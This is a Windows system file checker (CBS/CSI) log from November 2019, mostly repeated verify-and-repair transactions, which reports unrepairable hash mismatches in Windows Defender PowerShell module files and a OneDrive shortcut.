2019-11-26 17:55:22, Info                  CSI    00003445 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:24, Info                  CSI    000034b2 [SR] Verify complete
2019-11-26 17:55:25, Info                  CSI    000034b3 [SR] Verifying 100 components
2019-11-26 17:55:25, Info                  CSI    000034b4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:27, Info                  CSI    00003519 [SR] Verify complete
2019-11-26 17:55:27, Info                  CSI    0000351a [SR] Verifying 100 components
2019-11-26 17:55:27, Info                  CSI    0000351b [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:30, Info                  CSI    00003583 [SR] Verify complete
2019-11-26 17:55:30, Info                  CSI    00003584 [SR] Verifying 100 components
2019-11-26 17:55:30, Info                  CSI    00003585 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:33, Info                  CSI    000035f1 [SR] Verify complete
2019-11-26 17:55:33, Info                  CSI    000035f2 [SR] Verifying 100 components
2019-11-26 17:55:33, Info                  CSI    000035f3 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:35, Info                  CSI    0000365a [SR] Verify complete
2019-11-26 17:55:35, Info                  CSI    0000365b [SR] Verifying 100 components
2019-11-26 17:55:35, Info                  CSI    0000365c [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:38, Info                  CSI    000036d2 [SR] Verify complete
2019-11-26 17:55:38, Info                  CSI    000036d3 [SR] Verifying 100 components
2019-11-26 17:55:38, Info                  CSI    000036d4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:41, Info                  CSI    00003743 [SR] Verify complete
2019-11-26 17:55:41, Info                  CSI    00003744 [SR] Verifying 100 components
2019-11-26 17:55:41, Info                  CSI    00003745 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:43, Info                  CSI    000037ae [SR] Verify complete
2019-11-26 17:55:43, Info                  CSI    000037af [SR] Verifying 100 components
2019-11-26 17:55:43, Info                  CSI    000037b0 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:46, Info                  CSI    00003817 [SR] Verify complete
2019-11-26 17:55:46, Info                  CSI    00003818 [SR] Verifying 100 components
2019-11-26 17:55:46, Info                  CSI    00003819 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:48, Info                  CSI    0000387e [SR] Verify complete
2019-11-26 17:55:48, Info                  CSI    0000387f [SR] Verifying 100 components
2019-11-26 17:55:48, Info                  CSI    00003880 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:50, Info                  CSI    000038e7 [SR] Verify complete
2019-11-26 17:55:50, Info                  CSI    000038e8 [SR] Verifying 100 components
2019-11-26 17:55:50, Info                  CSI    000038e9 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:52, Info                  CSI    00003952 [SR] Verify complete
2019-11-26 17:55:53, Info                  CSI    00003953 [SR] Verifying 100 components
2019-11-26 17:55:53, Info                  CSI    00003954 [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:55, Info                  CSI    000039ba [SR] Verify complete
2019-11-26 17:55:55, Info                  CSI    000039bb [SR] Verifying 100 components
2019-11-26 17:55:55, Info                  CSI    000039bc [SR] Beginning Verify and Repair transaction
2019-11-26 17:55:57, Info                  CSI    00003a21 [SR] Verify complete
2019-11-26 17:55:58, Info                  CSI    00003a22 [SR] Verifying 100 components
2019-11-26 17:55:58, Info                  CSI    00003a23 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:00, Info                  CSI    00003a8a [SR] Verify complete
2019-11-26 17:56:00, Info                  CSI    00003a8b [SR] Verifying 100 components
2019-11-26 17:56:00, Info                  CSI    00003a8c [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:02, Info                  CSI    00003af3 [SR] Verify complete
2019-11-26 17:56:03, Info                  CSI    00003af4 [SR] Verifying 100 components
2019-11-26 17:56:03, Info                  CSI    00003af5 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:05, Info                  CSI    00003b62 [SR] Verify complete
2019-11-26 17:56:06, Info                  CSI    00003b63 [SR] Verifying 100 components
2019-11-26 17:56:06, Info                  CSI    00003b64 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:10, Info                  CSI    00003bde [SR] Verify complete
2019-11-26 17:56:10, Info                  CSI    00003bdf [SR] Verifying 100 components
2019-11-26 17:56:10, Info                  CSI    00003be0 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:12, Info                  CSI    00003c4b [SR] Verify complete
2019-11-26 17:56:12, Info                  CSI    00003c4c [SR] Verifying 100 components
2019-11-26 17:56:12, Info                  CSI    00003c4d [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:14, Info                  CSI    00003cb2 [SR] Verify complete
2019-11-26 17:56:14, Info                  CSI    00003cb3 [SR] Verifying 100 components
2019-11-26 17:56:14, Info                  CSI    00003cb4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:16, Info                  CSI    00003d19 [SR] Verify complete
2019-11-26 17:56:16, Info                  CSI    00003d1a [SR] Verifying 100 components
2019-11-26 17:56:16, Info                  CSI    00003d1b [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:18, Info                  CSI    00003d80 [SR] Verify complete
2019-11-26 17:56:18, Info                  CSI    00003d81 [SR] Verifying 100 components
2019-11-26 17:56:18, Info                  CSI    00003d82 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:21, Info                  CSI    00003de7 [SR] Verify complete
2019-11-26 17:56:21, Info                  CSI    00003de8 [SR] Verifying 100 components
2019-11-26 17:56:21, Info                  CSI    00003de9 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:23, Info                  CSI    00003e4e [SR] Verify complete
2019-11-26 17:56:23, Info                  CSI    00003e4f [SR] Verifying 100 components
2019-11-26 17:56:23, Info                  CSI    00003e50 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:25, Info                  CSI    00003eb5 [SR] Verify complete
2019-11-26 17:56:25, Info                  CSI    00003eb6 [SR] Verifying 100 components
2019-11-26 17:56:25, Info                  CSI    00003eb7 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:27, Info                  CSI    00003f1c [SR] Verify complete
2019-11-26 17:56:27, Info                  CSI    00003f1d [SR] Verifying 100 components
2019-11-26 17:56:27, Info                  CSI    00003f1e [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:29, Info                  CSI    00003f83 [SR] Verify complete
2019-11-26 17:56:29, Info                  CSI    00003f84 [SR] Verifying 100 components
2019-11-26 17:56:29, Info                  CSI    00003f85 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:31, Info                  CSI    00003fea [SR] Verify complete
2019-11-26 17:56:31, Info                  CSI    00003feb [SR] Verifying 100 components
2019-11-26 17:56:31, Info                  CSI    00003fec [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:33, Info                  CSI    00004051 [SR] Verify complete
2019-11-26 17:56:33, Info                  CSI    00004052 [SR] Verifying 100 components
2019-11-26 17:56:33, Info                  CSI    00004053 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:35, Info                  CSI    000040b8 [SR] Verify complete
2019-11-26 17:56:35, Info                  CSI    000040b9 [SR] Verifying 100 components
2019-11-26 17:56:35, Info                  CSI    000040ba [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:37, Info                  CSI    0000411f [SR] Verify complete
2019-11-26 17:56:37, Info                  CSI    00004120 [SR] Verifying 100 components
2019-11-26 17:56:37, Info                  CSI    00004121 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:40, Info                  CSI    00004186 [SR] Verify complete
2019-11-26 17:56:40, Info                  CSI    00004187 [SR] Verifying 100 components
2019-11-26 17:56:40, Info                  CSI    00004188 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:42, Info                  CSI    000041fa [SR] Verify complete
2019-11-26 17:56:42, Info                  CSI    000041fb [SR] Verifying 100 components
2019-11-26 17:56:42, Info                  CSI    000041fc [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:44, Info                  CSI    00004261 [SR] Verify complete
2019-11-26 17:56:44, Info                  CSI    00004262 [SR] Verifying 100 components
2019-11-26 17:56:44, Info                  CSI    00004263 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:46, Info                  CSI    000042c8 [SR] Verify complete
2019-11-26 17:56:46, Info                  CSI    000042c9 [SR] Verifying 100 components
2019-11-26 17:56:46, Info                  CSI    000042ca [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:48, Info                  CSI    0000432f [SR] Verify complete
2019-11-26 17:56:48, Info                  CSI    00004330 [SR] Verifying 100 components
2019-11-26 17:56:48, Info                  CSI    00004331 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:50, Info                  CSI    00004396 [SR] Verify complete
2019-11-26 17:56:50, Info                  CSI    00004397 [SR] Verifying 100 components
2019-11-26 17:56:50, Info                  CSI    00004398 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:52, Info                  CSI    000043fd [SR] Verify complete
2019-11-26 17:56:52, Info                  CSI    000043fe [SR] Verifying 100 components
2019-11-26 17:56:52, Info                  CSI    000043ff [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:53, Info                  CSI    00004464 [SR] Verify complete
2019-11-26 17:56:54, Info                  CSI    00004465 [SR] Verifying 100 components
2019-11-26 17:56:54, Info                  CSI    00004466 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:56, Info                  CSI    000044cb [SR] Verify complete
2019-11-26 17:56:56, Info                  CSI    000044cc [SR] Verifying 100 components
2019-11-26 17:56:56, Info                  CSI    000044cd [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:57, Info                  CSI    00004532 [SR] Verify complete
2019-11-26 17:56:57, Info                  CSI    00004533 [SR] Verifying 100 components
2019-11-26 17:56:57, Info                  CSI    00004534 [SR] Beginning Verify and Repair transaction
2019-11-26 17:56:59, Info                  CSI    00004599 [SR] Verify complete
2019-11-26 17:56:59, Info                  CSI    0000459a [SR] Verifying 100 components
2019-11-26 17:56:59, Info                  CSI    0000459b [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:00, Info                  CSI    0000459d [SR] Cannot repair member file [l:26]'MSFT_MpThreatCatalog.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    0000459f [SR] Cannot repair member file [l:13]'Defender.psd1' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a1 [SR] Cannot repair member file [l:20]'MSFT_MpWDOScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a3 [SR] Cannot repair member file [l:22]'MSFT_MpSignature.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a5 [SR] Cannot repair member file [l:19]'MSFT_MpThreat.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a7 [SR] Cannot repair member file [l:27]'MSFT_MpComputerStatus.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045a9 [SR] Cannot repair member file [l:17]'MSFT_MpScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045ab [SR] Cannot repair member file [l:28]'MSFT_MpThreatDetection.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045ad [SR] Cannot repair member file [l:23]'MSFT_MpPreference.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045c1 [SR] Cannot repair member file [l:26]'MSFT_MpThreatCatalog.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045c2 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045c4 [SR] Cannot repair member file [l:13]'Defender.psd1' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045c5 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045c7 [SR] Cannot repair member file [l:20]'MSFT_MpWDOScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045c8 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045ca [SR] Cannot repair member file [l:22]'MSFT_MpSignature.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045cb [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045cd [SR] Cannot repair member file [l:19]'MSFT_MpThreat.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045ce [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045d0 [SR] Cannot repair member file [l:27]'MSFT_MpComputerStatus.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045d1 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045d3 [SR] Cannot repair member file [l:17]'MSFT_MpScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045d4 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045d6 [SR] Cannot repair member file [l:28]'MSFT_MpThreatDetection.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045d7 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045d9 [SR] Cannot repair member file [l:23]'MSFT_MpPreference.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:57:00, Info                  CSI    000045da [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 17:57:00, Info                  CSI    000045dd [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpComputerStatus.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045e0 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreat.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045e3 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreatCatalog.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045e6 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreatDetection.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045e9 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpPreference.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045ec [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpScan.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045ef [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpWDOScan.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045f2 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpSignature.cdxml; source file in store is also corrupted
2019-11-26 17:57:00, Info                  CSI    000045f5 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\Defender.psd1; source file in store is also corrupted
2019-11-26 17:57:01, Info                  CSI    0000464b [SR] Verify complete
2019-11-26 17:57:02, Info                  CSI    0000464c [SR] Verifying 100 components
2019-11-26 17:57:02, Info                  CSI    0000464d [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:04, Info                  CSI    000046b2 [SR] Verify complete
2019-11-26 17:57:04, Info                  CSI    000046b3 [SR] Verifying 100 components
2019-11-26 17:57:04, Info                  CSI    000046b4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:07, Info                  CSI    00004719 [SR] Verify complete
2019-11-26 17:57:07, Info                  CSI    0000471a [SR] Verifying 100 components
2019-11-26 17:57:07, Info                  CSI    0000471b [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:08, Info                  CSI    00004780 [SR] Verify complete
2019-11-26 17:57:09, Info                  CSI    00004781 [SR] Verifying 100 components
2019-11-26 17:57:09, Info                  CSI    00004782 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:10, Info                  CSI    000047e7 [SR] Verify complete
2019-11-26 17:57:10, Info                  CSI    000047e8 [SR] Verifying 100 components
2019-11-26 17:57:10, Info                  CSI    000047e9 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:13, Info                  CSI    00004851 [SR] Verify complete
2019-11-26 17:57:13, Info                  CSI    00004852 [SR] Verifying 100 components
2019-11-26 17:57:13, Info                  CSI    00004853 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:15, Info                  CSI    000048b8 [SR] Verify complete
2019-11-26 17:57:15, Info                  CSI    000048b9 [SR] Verifying 100 components
2019-11-26 17:57:15, Info                  CSI    000048ba [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:17, Info                  CSI    0000491f [SR] Verify complete
2019-11-26 17:57:17, Info                  CSI    00004920 [SR] Verifying 100 components
2019-11-26 17:57:17, Info                  CSI    00004921 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:19, Info                  CSI    00004986 [SR] Verify complete
2019-11-26 17:57:19, Info                  CSI    00004987 [SR] Verifying 100 components
2019-11-26 17:57:19, Info                  CSI    00004988 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:21, Info                  CSI    000049ed [SR] Verify complete
2019-11-26 17:57:21, Info                  CSI    000049ee [SR] Verifying 100 components
2019-11-26 17:57:21, Info                  CSI    000049ef [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:22, Info                  CSI    00004a54 [SR] Verify complete
2019-11-26 17:57:22, Info                  CSI    00004a55 [SR] Verifying 100 components
2019-11-26 17:57:22, Info                  CSI    00004a56 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:24, Info                  CSI    00004abb [SR] Verify complete
2019-11-26 17:57:25, Info                  CSI    00004abc [SR] Verifying 100 components
2019-11-26 17:57:25, Info                  CSI    00004abd [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:26, Info                  CSI    00004b22 [SR] Verify complete
2019-11-26 17:57:26, Info                  CSI    00004b23 [SR] Verifying 100 components
2019-11-26 17:57:26, Info                  CSI    00004b24 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:28, Info                  CSI    00004b89 [SR] Verify complete
2019-11-26 17:57:29, Info                  CSI    00004b8a [SR] Verifying 100 components
2019-11-26 17:57:29, Info                  CSI    00004b8b [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:31, Info                  CSI    00004bf1 [SR] Verify complete
2019-11-26 17:57:31, Info                  CSI    00004bf2 [SR] Verifying 100 components
2019-11-26 17:57:31, Info                  CSI    00004bf3 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:33, Info                  CSI    00004c5f [SR] Verify complete
2019-11-26 17:57:33, Info                  CSI    00004c60 [SR] Verifying 100 components
2019-11-26 17:57:33, Info                  CSI    00004c61 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:35, Info                  CSI    00004cc6 [SR] Verify complete
2019-11-26 17:57:36, Info                  CSI    00004cc7 [SR] Verifying 100 components
2019-11-26 17:57:36, Info                  CSI    00004cc8 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:38, Info                  CSI    00004d2d [SR] Verify complete
2019-11-26 17:57:38, Info                  CSI    00004d2e [SR] Verifying 100 components
2019-11-26 17:57:38, Info                  CSI    00004d2f [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:40, Info                  CSI    00004d96 [SR] Verify complete
2019-11-26 17:57:40, Info                  CSI    00004d97 [SR] Verifying 100 components
2019-11-26 17:57:40, Info                  CSI    00004d98 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:42, Info                  CSI    00004dfd [SR] Verify complete
2019-11-26 17:57:42, Info                  CSI    00004dfe [SR] Verifying 100 components
2019-11-26 17:57:42, Info                  CSI    00004dff [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:46, Info                  CSI    00004ea7 [SR] Verify complete
2019-11-26 17:57:46, Info                  CSI    00004ea8 [SR] Verifying 100 components
2019-11-26 17:57:46, Info                  CSI    00004ea9 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:48, Info                  CSI    00004f0e [SR] Verify complete
2019-11-26 17:57:48, Info                  CSI    00004f0f [SR] Verifying 100 components
2019-11-26 17:57:48, Info                  CSI    00004f10 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:50, Info                  CSI    00004f77 [SR] Verify complete
2019-11-26 17:57:50, Info                  CSI    00004f78 [SR] Verifying 100 components
2019-11-26 17:57:50, Info                  CSI    00004f79 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:53, Info                  CSI    00004fe4 [SR] Verify complete
2019-11-26 17:57:53, Info                  CSI    00004fe5 [SR] Verifying 100 components
2019-11-26 17:57:53, Info                  CSI    00004fe6 [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:55, Info                  CSI    0000504b [SR] Verify complete
2019-11-26 17:57:55, Info                  CSI    0000504c [SR] Verifying 100 components
2019-11-26 17:57:55, Info                  CSI    0000504d [SR] Beginning Verify and Repair transaction
2019-11-26 17:57:58, Info                  CSI    000050b2 [SR] Verify complete
2019-11-26 17:57:58, Info                  CSI    000050b3 [SR] Verifying 100 components
2019-11-26 17:57:58, Info                  CSI    000050b4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:00, Info                  CSI    00005119 [SR] Verify complete
2019-11-26 17:58:00, Info                  CSI    0000511a [SR] Verifying 100 components
2019-11-26 17:58:00, Info                  CSI    0000511b [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:03, Info                  CSI    0000519a [SR] Verify complete
2019-11-26 17:58:03, Info                  CSI    0000519b [SR] Verifying 100 components
2019-11-26 17:58:03, Info                  CSI    0000519c [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:06, Info                  CSI    0000523f [SR] Verify complete
2019-11-26 17:58:07, Info                  CSI    00005240 [SR] Verifying 100 components
2019-11-26 17:58:07, Info                  CSI    00005241 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:09, Info                  CSI    000052a6 [SR] Verify complete
2019-11-26 17:58:09, Info                  CSI    000052a7 [SR] Verifying 100 components
2019-11-26 17:58:09, Info                  CSI    000052a8 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:14, Info                  CSI    0000532f [SR] Verify complete
2019-11-26 17:58:14, Info                  CSI    00005330 [SR] Verifying 100 components
2019-11-26 17:58:14, Info                  CSI    00005331 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:16, Info                  CSI    00005396 [SR] Verify complete
2019-11-26 17:58:16, Info                  CSI    00005397 [SR] Verifying 100 components
2019-11-26 17:58:16, Info                  CSI    00005398 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:18, Info                  CSI    000053fd [SR] Verify complete
2019-11-26 17:58:18, Info                  CSI    000053fe [SR] Verifying 100 components
2019-11-26 17:58:18, Info                  CSI    000053ff [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:20, Info                  CSI    0000546a [SR] Verify complete
2019-11-26 17:58:20, Info                  CSI    0000546b [SR] Verifying 100 components
2019-11-26 17:58:20, Info                  CSI    0000546c [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:24, Info                  CSI    000054d7 [SR] Verify complete
2019-11-26 17:58:24, Info                  CSI    000054d8 [SR] Verifying 100 components
2019-11-26 17:58:24, Info                  CSI    000054d9 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:26, Info                  CSI    0000553e [SR] Verify complete
2019-11-26 17:58:26, Info                  CSI    0000553f [SR] Verifying 100 components
2019-11-26 17:58:26, Info                  CSI    00005540 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:28, Info                  CSI    000055a5 [SR] Verify complete
2019-11-26 17:58:28, Info                  CSI    000055a6 [SR] Verifying 100 components
2019-11-26 17:58:28, Info                  CSI    000055a7 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:30, Info                  CSI    0000560c [SR] Verify complete
2019-11-26 17:58:30, Info                  CSI    0000560d [SR] Verifying 100 components
2019-11-26 17:58:30, Info                  CSI    0000560e [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:32, Info                  CSI    00005674 [SR] Verify complete
2019-11-26 17:58:32, Info                  CSI    00005675 [SR] Verifying 100 components
2019-11-26 17:58:32, Info                  CSI    00005676 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:36, Info                  CSI    000056f4 [SR] Verify complete
2019-11-26 17:58:36, Info                  CSI    000056f5 [SR] Verifying 100 components
2019-11-26 17:58:36, Info                  CSI    000056f6 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:39, Info                  CSI    00005787 [SR] Verify complete
2019-11-26 17:58:39, Info                  CSI    00005788 [SR] Verifying 100 components
2019-11-26 17:58:39, Info                  CSI    00005789 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:41, Info                  CSI    000057ee [SR] Verify complete
2019-11-26 17:58:41, Info                  CSI    000057ef [SR] Verifying 100 components
2019-11-26 17:58:41, Info                  CSI    000057f0 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:44, Info                  CSI    0000585b [SR] Verify complete
2019-11-26 17:58:44, Info                  CSI    0000585c [SR] Verifying 100 components
2019-11-26 17:58:44, Info                  CSI    0000585d [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:45, Info                  CSI    0000585f [SR] Cannot repair member file [l:12]'OneDrive.lnk' of Microsoft-Windows-OneDrive-Setup, version 10.0.17134.1, arch Host= amd64 Guest= x86, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:58:47, Info                  CSI    000058c4 [SR] Cannot repair member file [l:12]'OneDrive.lnk' of Microsoft-Windows-OneDrive-Setup, version 10.0.17134.1, arch Host= amd64 Guest= x86, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 17:58:47, Info                  CSI    000058c5 [SR] This component was referenced by [l:116]'Microsoft-Windows-OneDrive-Setup-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.f647690e04ff7e43581b577deaab5f78'
2019-11-26 17:58:47, Info                  CSI    000058c7 [SR] Could not reproject corrupted file \??\C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\\OneDrive.lnk; source file in store is also corrupted
